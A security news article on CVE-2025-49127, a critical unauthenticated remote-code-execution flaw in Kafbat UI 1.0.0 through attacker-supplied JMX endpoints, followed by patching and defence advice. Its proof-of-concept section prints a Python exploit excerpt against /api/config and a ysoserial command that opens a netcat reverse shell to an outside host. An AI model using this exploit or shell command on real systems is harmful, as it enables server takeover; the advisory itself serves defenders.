Kafbat UI Vulnerabilities Enable Arbitrary Code Execution via JMX Services

Kafbat UI, the popular open-source dashboard for Apache Kafka, has been hit by CVE-2025-49127—a critical remote-code-execution (RCE) flaw scored CVSS 10.0.

Version 1.0.0 blindly opens Java Management Extensions (JMX) connections supplied through its convenient “dynamic cluster configuration” feature.

By pointing the interface at an attacker-controlled JMX endpoint, a threat actor can trigger unsafe deserialization and run arbitrary commands on the server—no login required.

Sponsored

class="wp-block-heading">1. Attack Vector:

When administrators add a cluster, Kafbat UI builds a JMX URL from user data instead of a whitelist:

java// JmxMetricsRetriever.java
String jmxUrl = "service:jmx:rmi:///jndi/rmi://" 
        + node.host() + ":" + c.getMetricsConfig().getPort()
        + "/jmxrmi";       // user-controlled host & port
connector.connect(env);     // triggers RMI ↔ deserialization

Because authentication is disabled by default (auth.type: DISABLED), anyone can send a PUT request to /api/config that sets metrics.type: "JMX" and a rogue port.

During its 30-second metrics poll, the scheduler calls connector.connect(), starting a Java RMI handshake.

A malicious server then delivers a CommonsCollections7 gadget chain generated with ysoserial, pivoting into Runtime.exec().

2. Proof-of-Concept:

Researchers released a two-phase exploit that first enables unsafe deserialization, then launches a reverse shell:

python# cve202549127_exploit.py (excerpt)
payload = {
  "config": {
    "properties": {
      "kafka": {
        "clusters": [{
          "name": "rce",
          "bootstrapServers": "kafka-malicious-broker:9093",
          "metrics": {"type": "JMX", "port": 1719}
        }]
      }
    }
  }
}
requests.put("http://target:8080/api/config", json=payload, timeout=30)

Running

textjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 1719 CommonsCollections7 
     "nc 192.0.2.10 9094 -e /bin/sh"

followed by a Netcat listener on 9094 reliably hands back a shell within seconds on a stock Docker deployment.

3. Patching and Immediate Defenses

Maintainers have shipped Kafbat UI 1.1.0, which:

• Rejects untrusted JMX schemes and enforces allow-lists.
• Requires authentication for the /api/config endpoint.
• Adds a serialization filter (jdk.serialFilter) to block gadget payloads.

Operators should:

1. docker pull ghcr.io/kafbat/kafka-ui:v1.1.0 and redeploy.
2. Disable dynamic config in production: textenvironment: DYNAMIC_CONFIG_ENABLED: "false"
3. Block outbound RMI (1099/tcp) and custom JMX ports at the firewall.
4. Monitor for unsolicited service:jmx:rmi traffic; exploitation attempts leave tell-tale IllegalArgumentException: filter status: REJECTED logs once the patch is applied.

The zero-click nature of CVE-2025-49127 means unpatched dashboards are already attractive targets for crypto-miners and lateral-movement toolkits.

With proof-of-concept code public, defenders have little time: patch, segment, and monitor now—before your Kafka monitoring box becomes an attacker’s beachhead.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates

The post Kafbat UI Vulnerabilities Enable Arbitrary Code Execution via JMX Services appeared first on Cyber Security News.